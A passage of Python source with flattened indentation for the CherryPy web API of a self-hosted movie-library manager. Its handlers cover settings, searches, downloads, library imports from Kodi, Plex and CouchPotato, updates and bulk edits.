data (dict): of Section with nested dict of keys and values:
{'Section': {'key': 'val', 'key2': 'val2'}, 'Section2': {'key': 'val'}}
All dicts must contain the full tree or data will be lost.
        Fires off additional methods if necessary, e.g. scheduler restart/reloads
Returns dict ajax-style response
'''
logging.info('Saving settings.')
data = json.loads(data)
save_data = {}
for key in data:
if data[key] != core.CONFIG[key]:
save_data[key] = data[key]
if not save_data:
return {'response': True, 'message': _('Settings saved.')}
try:
config.write(save_data)
except (SystemExit, KeyboardInterrupt):
raise
except Exception as e:
logging.error('Writing config.', exc_info=True)
return {'response': False, 'error': _('Unable to write to config file.')}
return {'response': True, 'message': _('Settings saved.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def remove_movie(self, imdbid):
''' Removes movie
imdbid (str): imdb id #
Returns dict ajax-style response
'''
return Manage.remove_movie(imdbid)
@cherrypy.expose
@cherrypy.tools.json_out()
def delete_movie_file(self, imdbid):
''' Deletes movie file for imdbid
imdbid (str): imdb id #
Returns dict ajax-style response
'''
logging.info('Deleting file for {}.'.format(imdbid))
f = core.sql.get_movie_details('imdbid', imdbid).get('finished_file')
try:
logging.debug('Finished file for {} is {}'.format(imdbid, f))
if os.path.exists(f):
os.unlink(f)
core.sql.update_multiple_values('MOVIES', {'finished_date': None, 'finished_score': None, 'finished_file': None}, 'imdbid', imdbid)
return {'response': True, 'message': _('Deleted movie file {}.').format(f)}
except Exception as e:
logging.error('Unable to delete file {}'.format(f), exc_info=True)
return {'response': False, 'error': str(e)}
@cherrypy.expose
@cherrypy.tools.json_out()
def search(self, imdbid):
''' Search indexers for specific movie.
imdbid (str): imdb id #
Gets movie data from database and sends to searcher.search()
Returns dict ajax-style response
'''
logging.info('Starting user-requested backlog search for {}'.format(imdbid))
movie = core.sql.get_movie_details('imdbid', imdbid)
if not movie:
return {'response': False, 'error': Errors.database_read.format(imdbid)}
else:
success = searcher.search(imdbid, movie['title'], movie['year'], movie['quality'])
status = core.sql.get_movie_details('imdbid', imdbid)['status']
if success:
results = core.sql.get_search_results(imdbid, movie['quality'], rejected=True)
for i in results:
i['size'] = Conversions.human_file_size(i['size'])
r = {'response': True, 'results': results, 'movie_status': status}
if len(results) == 0:
ne = core.scheduler_plugin.task_list['Movie Search'].next_execution
r['next'] = Conversions.human_datetime(ne) if ne else '[Disabled]'
return r
else:
return {'response': False, 'error': Errors.database_read.format(imdbid), 'movie_status': status}
@cherrypy.expose
@cherrypy.tools.json_out()
def manual_download(self, year, guid, kind):
''' Sends search result to downloader manually
guid (str): download link for nzb/magnet/torrent file.
kind (str): type of download (torrent, magnet, nzb)
Returns dict ajax-style response
'''
torrent_enabled = core.CONFIG['Downloader']['Sources']['torrentenabled']
usenet_enabled = core.CONFIG['Downloader']['Sources']['usenetenabled']
if kind == 'nzb' and not usenet_enabled:
            return {'response': False, 'error': _('Link is NZB but no Usenet client is enabled.')}
elif kind in ('torrent', 'magnet') and not torrent_enabled:
return {'response': False, 'error': _('Link is Torrent/Magnet but no Torrent client is enabled.')}
data = dict(core.sql.get_single_search_result('guid', guid))
if data:
data['year'] = year
return snatcher.download(data)
else:
return {'response': False, 'error': Errors.database_read.format(kind)}
@cherrypy.expose
@cherrypy.tools.json_out()
def mark_bad(self, guid, imdbid, cancel_download=False):
''' Marks guid as bad in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
cancel_download (bool): send command to download client to cancel download
Returns dict ajax-style response
'''
sr_orig = core.sql.get_single_search_result('guid', guid)
sr = Manage.searchresults(guid, 'Bad')
Manage.markedresults(guid, 'Bad', imdbid=imdbid)
if sr:
response = {'response': True, 'message': _('Marked release as Bad.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = Manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
if cancel_download:
cancelled = False
if sr_orig.get('status') != 'Snatched':
return response
client = sr_orig['download_client'] if sr_orig else None
downloadid = sr_orig['downloadid'] if sr_orig else None
if not client:
logging.info('Download client not found, cannot cancel download.')
return response
else:
cancelled = getattr(downloaders, client).cancel_download(downloadid)
if not cancelled:
response['response'] = False
response['error'] = response.get('error', '') + _(' Could not remove download from client.')
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def unmark_bad(self, guid, imdbid):
''' Removes bad mark for guid in SEARCHRESULTS and MARKEDRESULTS
guid (str): guid of download to mark
imdbid (str): imdb id # of movie
Returns dict ajax-style response
'''
logging.info('Removing {} from MARKEDRESULTS.'.format(guid.split('&')[0]))
if not core.sql.delete('MARKEDRESULTS', 'guid', guid):
logging.info('Removing MARKEDRESULTS {} failed.'.format(guid.split('&')[0]))
return {'response': False, 'error': Errors.database_write}
else:
logging.info('Successfully removed {} from MARKEDRESULTS.'.format(guid.split('&')[0]))
sr = Manage.searchresults(guid, 'Available')
if sr:
response = {'response': True, 'message': _('Marked release as Available.')}
else:
response = {'response': False, 'error': Errors.database_write}
response['movie_status'] = Manage.movie_status(imdbid)
if not response['movie_status']:
response['error'] = (Errors.database_write)
response['response'] = False
return response
@cherrypy.expose
def notification_remove(self, index):
''' Removes notification from core.notification
index (str/int): index of notification to remove
'index' will be of type string since it comes from ajax request.
Therefore we convert to int here before passing to Notification
Simply calls Notification module.
Does not return
'''
notification.remove(int(index))
return
@cherrypy.expose
@cherrypy.tools.json_out()
def update_check(self):
''' Manually check for updates
Returns list:
[0] dict ajax-style response
[1] dict of core notifications
'''
response = core.updater.update_check()
if response['status'] == 'current':
n = [[{'message': _('No updates available.')}, {'type': 'primary'}]]
return [response, n]
else:
return [response, core.NOTIFICATIONS]
@cherrypy.expose
@cherrypy.tools.json_out()
def test_downloader_connection(self, mode, data):
''' Test connection to downloader.
mode (str): which downloader to test.
data (dict): connection information (url, port, login, etc)
Executes staticmethod in the chosen downloader's class.
Returns dict ajax-style response
'''
response = {}
data = json.loads(data)
test = getattr(downloaders, mode).test_connection(data)
if test is True:
response['response'] = True
response['message'] = _('Connection successful.')
else:
response['response'] = False
response['error'] = test
return response
@cherrypy.expose
def server_status(self, mode):
''' Check or modify status of CherryPy server_status
mode (str): command or request of state
Restarts or Shuts Down server in separate thread.
Delays by one second to allow browser to redirect.
If mode == 'online', asks server for status.
(ENGINE.started, ENGINE.stopped, etc.)
Returns nothing for mode == restart || shutdown
Returns str server state if mode == online
'''
if mode == 'restart':
threading.Timer(1, core.restart).start()
return
elif mode == 'shutdown':
threading.Timer(1, core.shutdown).start()
return
elif mode == 'online':
return str(cherrypy.engine.state)
@cherrypy.expose
def update_server(self, mode):
''' Starts and executes update process.
mode (str): 'set_true' or 'update_now'
This method has two major functions based on mode
set_true:
Sets core.UPDATING to True, the browser should then automatically redirect
the user to the update page that calls update_server('update_now')
update_now:
Starts update process:
* Stops task scheduler to cancel all Timers
* Waits for in-process tasks to finish. Yields to browser a list of
currently-running tasks every 1.5 seconds
* Yields updating message to browser. Calls update method
* Sets core.UPDATING to False
* Yields response from update method to browser
If False, starts scheduler plugin again to get back to a normal state
If True, calls restart method. Browser is responsible for redirecting
                after the server is back up.
Returns dict ajax-style response
'''
if mode == 'set_true':
core.UPDATING = True
return json.dumps({'response': True})
if mode == 'update_now':
logging.info('Update process started.')
core.scheduler_plugin.stop()
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
while len(active_tasks) > 0:
yield json.dumps({'response': True, 'status': 'waiting', 'active_tasks': active_tasks})
active_tasks = [k for k, v in core.scheduler_plugin.task_list.items() if v.running]
time.sleep(1.5)
yield json.dumps({'response': True, 'status': 'updating'})
update_status = core.updater.execute_update()
core.UPDATING = False
if update_status is False:
logging.error('Update Failed.')
yield json.dumps({'response': False, 'error': _('Unable to complete update.')})
core.scheduler_plugin.restart()
elif update_status is True:
yield json.dumps({'response': True, 'status': 'complete'})
self.server_status('restart')
else:
return json.dumps({'response': False})
update_server._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def update_movie_options(self, quality, category, status, filters, imdbid):
''' Updates quality settings for individual title
quality (str): name of new quality
status (str): management state ('automatic', 'disabled')
filters (str): JSON.stringified dict of filter words
imdbid (str): imdb identification number
Returns dict ajax-style response
'''
success = {'response': True, 'message': _('Movie options updated.')}
logging.info('Setting Quality and filters for {}.'.format(imdbid))
if not core.sql.update_multiple_values('MOVIES', {'quality': quality, 'category': category, 'filters': filters}, 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
logging.info('Updating status to {} for {}.'.format(status, imdbid))
if status == 'Automatic':
if not core.sql.update('MOVIES', 'status', 'Waiting', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
new_status = Manage.movie_status(imdbid)
if not new_status:
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = new_status
return success
elif status == 'Disabled':
if not core.sql.update('MOVIES', 'status', 'Disabled', 'imdbid', imdbid):
return {'response': False, 'error': Errors.database_write}
else:
success['status'] = 'Disabled'
return success
@cherrypy.expose
def get_log_text(self, logfile):
''' Gets log file contents
logfile (str): name of log file to read
logfile should be filename only, not the path to the file
Returns str
'''
logging.info('Dumping log file {} to text.'.format(logfile))
with open(os.path.join(core.LOG_DIR, logfile), 'r') as f:
log_text = ''.join(reversed(f.readlines()))
return log_text
@cherrypy.expose
@cherrypy.tools.json_out()
def indexer_test(self, indexer, apikey, mode):
''' Tests connection to newznab indexer
indexer (str): url of indexer
apikey (str): indexer's api key
mode (str): newznab or torznab
Returns dict ajax-style response
'''
if mode == 'newznab':
return newznab.NewzNab.test_connection(indexer, apikey)
elif mode == 'torznab':
return torrent.Torrent.test_connection(indexer, apikey)
else:
return {'response': False, 'error': _('Invalid test mode.')}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_plugin_conf(self, folder, conf):
''' Calls plugin_conf_popup to render html
folder (str): folder to read config file from
conf (str): filename of config file (ie 'my_plugin.conf')
Returns string
'''
c = os.path.join(core.PLUGIN_DIR, folder, conf)
logging.info('Reading plugin config {}'.format(c))
try:
with open(c) as f:
config = json.load(f)
except Exception as e:
logging.error('Unable to read config file.', exc_info=True)
return ''
return plugins.render_config(config)
@cherrypy.expose
@cherrypy.tools.json_out()
def save_plugin_conf(self, folder, filename, config):
''' Calls plugin_conf_popup to render html
folder (str): folder to store config file
filename (str): filename of config file (ie 'my_plugin.conf')
config (str): json data to store in conf file
Returns dict ajax-style response
'''
conf_file = os.path.join(core.PROG_PATH, core.PLUGIN_DIR, folder, filename)
logging.info('Saving plugin config as {}'.format(conf_file))
config = json.loads(config)
response = {'response': True, 'message': _('Settings saved.')}
try:
with open(conf_file, 'w') as output:
json.dump(config, output, indent=2)
except Exception as e:
response = {'response': False, 'error': str(e)}
return response
@cherrypy.expose
def scan_library_directory(self, directory, minsize, recursive, skipduplicatedirs, maxresults):
''' Calls library to scan directory for movie files
directory (str): directory to scan
minsize (str/int): minimum file size in mb, coerced to int
recursive (bool): whether or not to search subdirs
skipduplicatedirs (bool): whether or not to skip duplicate dirs
maxresults (str/int): maximum result count, coerced to int
Finds all files larger than minsize in directory.
Removes all movies from gathered list that are already in library.
        If error, yields {'error': reason} and stops iteration
If movie has all metadata, yields:
{'complete': {<metadata>}}
If missing imdbid or resolution, yields:
            {'incomplete': {<known metadata>}}
All metadata dicts include:
'path': 'absolute path to file'
'progress': '10 of 250'
        Yields dict ajax-style response
'''
recursive = json.loads(recursive)
minsize = int(minsize)
# Note - do not limit the result set here, or we might get stuck looking at files we already have
files = core.library.ImportDirectory.scan_dir(directory, minsize, recursive)
if files.get('error'):
yield json.dumps({'error': files['error']})
            return  # PEP 479: raising StopIteration inside a generator is an error
user_movies = core.sql.get_user_movies()
library_files = [i['finished_file'] for i in user_movies]
library = [i['imdbid'] for i in user_movies]
files = [file for file in files['files'] if file not in library_files]
skipduplicatedirs = json.loads(skipduplicatedirs)
if skipduplicatedirs:
# Build dict of dir:[files]
library_file_dirs = {}
for f in library_files:
if f:
fd = os.path.dirname(f)
library_file_dirs.setdefault(fd, []).append(f)
# Log all possible duplicate dirs to help with manual maintenance
for f in files:
fd = os.path.dirname(f)
if fd in library_file_dirs:
logging.info('## {} directory already in library'.format(f))
for x in library_file_dirs[fd]:
logging.info('## {}'.format(x))
# Remove the files which have duplicate dirs (likely to be the same imdbid)
# This avoids doing a metadata probe which is then ignored
files = [f for f in files if os.path.dirname(f) not in library_file_dirs]
# We do not need the dict any more, so release the memory
del library_file_dirs
# Limit the number of results
# We do this here instead of at the scan so we skip files we have already imported
maxresults = int(maxresults)
if maxresults and maxresults > 0:
files = files[0:maxresults]
length = len(files)
if length == 0:
yield json.dumps({'response': None})
            return  # PEP 479: raising StopIteration inside a generator is an error
logging.info('Parsing {} directory scan results.'.format(length))
for index, path in enumerate(files):
            logging.info('Gathering metadata for {}'.format(path))
metadata = {}
response = {'progress': [index + 1, length]}
try:
metadata = Metadata.from_file(path)
if not metadata.get('imdbid'):
metadata['imdbid'] = ''
logging.info('IMDB unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
elif metadata['imdbid'] in library:
logging.info('{} ({}) already in library, ignoring.'.format(metadata['title'], path))
response['response'] = 'in_library'
# Log all possible duplicate files to help with manual maintenance
for i in user_movies:
if i['imdbid'] == metadata['imdbid']:
logging.info('## {} {}'.format(i['imdbid'], i['finished_file']))
elif not metadata.get('resolution'):
logging.info('Resolution/Source unknown for import {}'.format(metadata['title']))
response['response'] = 'incomplete'
else:
logging.info('All data found for import {}'.format(metadata['title']))
response['response'] = 'complete'
if response['response'] == 'complete':
p = metadata.get('poster_path')
r = metadata.get('resolution')
metadata = Metadata.convert_to_db(metadata)
metadata['poster_path'] = p
metadata['resolution'] = r
metadata['size'] = os.path.getsize(path)
metadata['human_size'] = Conversions.human_file_size(metadata['size'])
metadata['finished_file'] = path
if response['response'] == 'in_library':
metadata = {'title': metadata['title']}
response['movie'] = metadata
yield json.dumps(response)
except Exception as e:
logging.warning('Error gathering metadata.', exc_info=True)
yield json.dumps({'response': 'incomplete', 'movie': metadata})
continue
scan_library_directory._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def import_dir(self, movies, corrected_movies):
''' Imports list of movies in data
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
corrected_movies must be [{'/path/to/file': {'known': 'metadata'}}]
        Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
        Yields dict ajax-style response
'''
logging.info('Adding directory scan movies to library.')
today = str(datetime.date.today())
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('{} corrected movies, gathering metadata.'.format(len(corrected_movies)))
for data in corrected_movies:
tmdbdata = TheMovieDatabase._search_tmdbid(data['tmdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
data['year'] = tmdbdata['release_date'][:4]
data.update(tmdbdata)
movie_data.append(data)
else:
logging.error('Unable to find {} on TMDB.'.format(data['tmdbid']))
yield json.dumps({'response': False, 'movie': data, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(data['tmdbid'])})
progress += 1
logging.info('Adding {} directory scan movies to library.'.format(len(movie_data)))
for movie in movie_data:
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Directory Import'
movie['finished_date'] = today
movie['id'] = movie['tmdbid']
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
else:
logging.error('Unable to find {} on TMDB.'.format(movie['title']))
logging.debug(movie)
                yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['title'])})
progress += 1
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_dir._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def list_files(self, current_dir, move_dir):
''' Lists files in directory
current_dir (str): base path
move_dir (str): child path to read
Joins and normalizes paths:
('/home/user/movies', '..')
Becomes /home/user
Returns dict ajax-style response
'''
current_dir = current_dir.strip()
move_dir = move_dir.strip()
response = {}
new_path = os.path.normpath(os.path.join(current_dir, move_dir))
response['new_path'] = new_path
try:
response['list'] = [i for i in os.listdir(new_path) if os.path.isdir(os.path.join(new_path, i)) and not i.startswith('.')]
response['list'].sort()
except Exception as e:
response = {'error': str(e)}
logging.error('Error listing directory.', exc_info=True)
return response
@cherrypy.expose
@cherrypy.tools.json_out()
def update_metadata(self, imdbid, tmdbid=None):
''' Re-downloads metadata for imdbid
imdbid (str): imdbid of movie
tmdbid (str): tmdbid of movie <optional - default None>
If tmdbid is None, looks in database for tmdbid using imdbid.
If that fails, looks on tmdb api for imdbid
If that fails returns error message
Returns dict ajax-style response
'''
r = Metadata.update(imdbid, tmdbid)
if r['response'] is True:
return {'response': True, 'message': _('Metadata updated.')}
else:
return r
@cherrypy.expose
@cherrypy.tools.json_out()
def single_movie_details(self, key, value):
''' Gets single movie's details from database
key (str): key for sql.get_movie_details
value (str): value for sql.get_movie_details
Returns dict
'''
return core.sql.get_movie_details(key, value)
@cherrypy.expose
@cherrypy.tools.json_out()
def set_movie_details(self, data):
''' Updates movie in database
data (dict): movie fields and values to update
data *must* include valid tmdbid
Returns dict
'''
data = json.loads(data)
tmdbid = data.pop('tmdbid')
if not core.sql.update_multiple_values('MOVIES', data, 'tmdbid', tmdbid):
return {'response': False, 'error': Errors.database_write}
else:
return {'response': True, 'message': 'Database Updated'}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_kodi_movies(self, url):
''' Gets list of movies from kodi server
url (str): url of kodi server
Calls Kodi import method to gather list.
Returns dict ajax-style response
'''
return library.ImportKodiLibrary.get_movies(url)
@cherrypy.expose
def import_kodi_movies(self, movies):
''' Imports list of movies in movies from Kodi library
movie_data (str): json-formatted list of dicts of movies
Iterates through movies and gathers all required metadata.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
        Yields dict ajax-style response
'''
movies = json.loads(movies)
fake_results = []
success = []
length = len(movies)
progress = 1
logging.info('Adding {} Kodi movies to library.'.format(length))
for movie in movies:
if not movie['imdbid']:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format("NONE")})
progress += 1
continue
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if not tmdb_data or not tmdb_data[0].get('id'):
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
tmdb_data = tmdb_data[0]
movie['id'] = tmdb_data['id']
movie['size'] = 0
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['finished_file'] = (movie.get('finished_file') or '').strip()
movie['origin'] = 'Kodi Import'
response = Manage.add_movie(movie)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'title': movie['title'], 'imdbid': movie['imdbid'], 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_kodi_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def upload_plex_csv(self, file_input):
        ''' Receives upload of csv from browser
            file_input (bytes): csv file to read
Reads/parses csv file into a usable dict
Returns dict ajax-style response
'''
try:
csv_text = file_input.file.read().decode('utf-8')
file_input.file.close()
except Exception as e:
logging.error('Unable to parse Plex CSV', exc_info=True)
return {'response': False, 'error': str(e)}
if csv_text:
return library.ImportPlexLibrary.read_csv(csv_text)
else:
return {'response': True, 'complete': [], 'incomplete': []}
@cherrypy.expose
def import_plex_csv(self, movies, corrected_movies):
        ''' Imports list of movies generated by csv import
movie_data (list): dicts of movie info ready to import
corrected_movies (list): dicts of user-corrected movie info
        Iterates through corrected_movies and attempts to get metadata again if required.
If imported, generates and stores fake search result.
Creates dict {'success': [], 'failed': []} and
appends movie data to the appropriate list.
Yeilds dict ajax-style response
'''
movie_data = json.loads(movies)
corrected_movies = json.loads(corrected_movies)
fake_results = []
success = []
length = len(movie_data) + len(corrected_movies)
progress = 1
if corrected_movies:
logging.info('Adding {} Plex movies to library.'.format(len(corrected_movies)))
for movie in corrected_movies:
tmdbdata = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdbdata:
tmdbdata = tmdbdata[0]
movie['year'] = tmdbdata['release_date'][:4]
movie.update(tmdbdata)
movie_data.append(movie)
else:
logging.error(Errors.tmdb_not_found.format(movie['imdbid']))
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
logging.info('Adding {} Plex movies to library.'.format(length))
for movie in movie_data:
logging.info('Importing Plex movie {} {}'.format(movie.get('title', ''), movie.get('year', '')))
fm = False
if not movie.get('imdbid') and movie.get('tmdbid'):
tmdb_data = TheMovieDatabase._search_tmdbid(movie['tmdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
fm = True
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['tmdbid'])})
progress += 1
continue
if movie.get('imdbid'):
movie['status'] = 'Disabled'
movie['predb'] = 'found'
movie['origin'] = 'Plex Import'
if not movie.get('id'):
tmdb_data = TheMovieDatabase._search_imdbid(movie['imdbid'])
if tmdb_data:
movie.update(tmdb_data[0])
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'title': movie['title'], 'error': Errors.tmdb_not_found.format(movie['imdbid'])})
progress += 1
continue
response = Manage.add_movie(movie, full_metadata=fm)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'title': movie['title'], 'imdbid': movie['imdbid']})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'progress': [progress, length], 'error': response['error'], 'title': movie['title']})
progress += 1
continue
else:
logging.error(Errors.tmdb_not_found.format(movie['title']))
yield json.dumps({'response': False, 'progress': [progress, length], 'error': _('Unable to find IMDB ID for {} on TheMovieDB.').format(movie['title']), 'title': movie['title']})
progress += 1
continue
if fake_results:
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
if fake_results:
core.sql.write_search_results(fake_results)
import_plex_csv._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def get_cp_movies(self, url, apikey):
''' Gets movies from CP server
url (str): url to cp server
apikey (str): cp api key
Reads/parses cp api response
Returns dict ajax-style response
'''
url = '{}/api/{}/movie.list/'.format(url, apikey)
if not url.startswith('http'):
url = 'http://{}'.format(url)
return library.ImportCPLibrary.get_movies(url)
@cherrypy.expose
def import_cp_movies(self, wanted, finished):
''' Imports movies from CP list to library
wanted (list): dicts of wanted movies
finished (list): dicts of finished movies
Yields dict ajax-style response
'''
wanted = json.loads(wanted)
finished = json.loads(finished)
fake_results = []
success = []
length = len(wanted) + len(finished)
progress = 1
logging.info('Adding {} Wanted CouchPotato movies to library.'.format(len(wanted)))
for movie in wanted:
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
        logging.info('Adding {} Finished CouchPotato movies to library.'.format(len(finished)))
for movie in finished:
movie['predb'] = 'found'
movie['status'] = 'Disabled'
movie['origin'] = 'CouchPotato Import'
response = Manage.add_movie(movie, full_metadata=True)
if response['response'] is True:
fake_results.append(searchresults.generate_simulacrum(movie))
yield json.dumps({'response': True, 'progress': [progress, length], 'movie': movie})
progress += 1
success.append(movie)
continue
else:
yield json.dumps({'response': False, 'movie': movie, 'progress': [progress, length], 'error': response['error']})
progress += 1
continue
fake_results = searchresults.score(fake_results, imported=True)
for i in success:
for r in fake_results:
if r['imdbid'] == i['imdbid']:
core.sql.update('MOVIES', 'finished_score', r['score'], 'imdbid', i['imdbid'])
break
core.sql.write_search_results(fake_results)
import_cp_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_backlog_search(self, movies):
''' Bulk manager action for backlog search
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk backlog search for {} movies.'.format(len(movies)))
ids = [i['imdbid'] for i in movies]
movies = [i for i in core.sql.get_user_movies() if i['imdbid'] in ids]
for i, movie in enumerate(movies):
            title = movie['title']
            year = movie['year']
            imdbid = movie['imdbid']
            quality = movie['quality']
logging.info('Performing backlog search for {} {}.'.format(title, year))
if not searcher.search(imdbid, title, year, quality):
response = {'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_backlog_search._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_update_metadata(self, movies):
''' Bulk manager action for metadata update
movies (list): dicts of movies, must contain keys imdbid and tmdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Performing bulk metadata update for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
r = Metadata.update(movie.get('imdbid'), movie.get('tmdbid'))
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_update_metadata._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_quality(self, movies, quality):
''' Bulk manager action to change movie quality profile
movies (list): dicts of movies, must contain keys imdbid
quality (str): quality to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting quality to {} for: {}'.format(quality, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'quality', quality, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_change_quality._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_change_category(self, movies, category):
''' Bulk manager action to change movie category
movies (list): dicts of movies, must contain keys imdbid
category (str): category to set movies to
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Setting category to {} for: {}'.format(category, ', '.join(i['imdbid'] for i in movies)))
for i, movie in enumerate(movies):
if not core.sql.update('MOVIES', 'category', category, 'imdbid', movie['imdbid']):
response = {'response': False, 'error': Errors.database_write, 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield json.dumps(response)
manager_change_category._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_reset_movies(self, movies):
''' Bulk manager action to reset movies
movies (list): dicts of movies, must contain key imdbid
Removes all search results
Updates database row with db_reset dict
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Resetting status for {} movies.'.format(len(movies)))
for i, movie in enumerate(movies):
logging.debug('Resetting {}'.format(movie['imdbid']))
imdbid = movie['imdbid']
if not core.sql.purge_search_results(imdbid):
yield json.dumps({'response': False, 'error': _('Unable to purge search results.'), 'imdbid': imdbid, 'index': i + 1})
continue
db_reset = {'quality': config.default_profile(),
'status': 'Waiting',
'finished_date': None,
'finished_score': None,
'backlog': 0,
'finished_file': None,
'predb': None,
'predb_backlog': None
}
if not core.sql.update_multiple_values('MOVIES', db_reset, 'imdbid', imdbid):
yield json.dumps({'response': False, 'error': Errors.database_write, 'imdbid': imdbid, 'index': i + 1})
continue
yield json.dumps({'response': True, 'index': i + 1})
manager_reset_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
def manager_remove_movies(self, movies):
''' Bulk action to remove movies
movies (list): dicts of movies, must contain key imdbid
Yields dict ajax-style response
'''
movies = json.loads(movies)
logging.info('Removing {} movies from library.'.format(len(movies)))
for i, movie in enumerate(movies):
r = self.remove_movie(movie['imdbid'])
if r['response'] is False:
response = {'response': False, 'error': r['error'], 'imdbid': movie['imdbid'], 'index': i + 1}
else:
response = {'response': True, 'index': i + 1}
yield(json.dumps(response))
manager_remove_movies._cp_config = {'response.stream': True, 'tools.gzip.on': False}
@cherrypy.expose
@cherrypy.tools.json_out()
def generate_stats(self, category=None):
''' Gets library stats for graphing page
Returns dict of library stats
'''
return Manage.get_stats(category)
@cherrypy.expose
@cherrypy.tools.json_out()
def create_backup(self):
''' Creates backup zip file ./watcher.zip
Returns dict ajax-style response
'''
logging.info('Creating backup of Watcher as {}'.format(os.path.join(core.PROG_PATH, 'watcher.zip')))
try:
backup.backup(require_confirm=False)
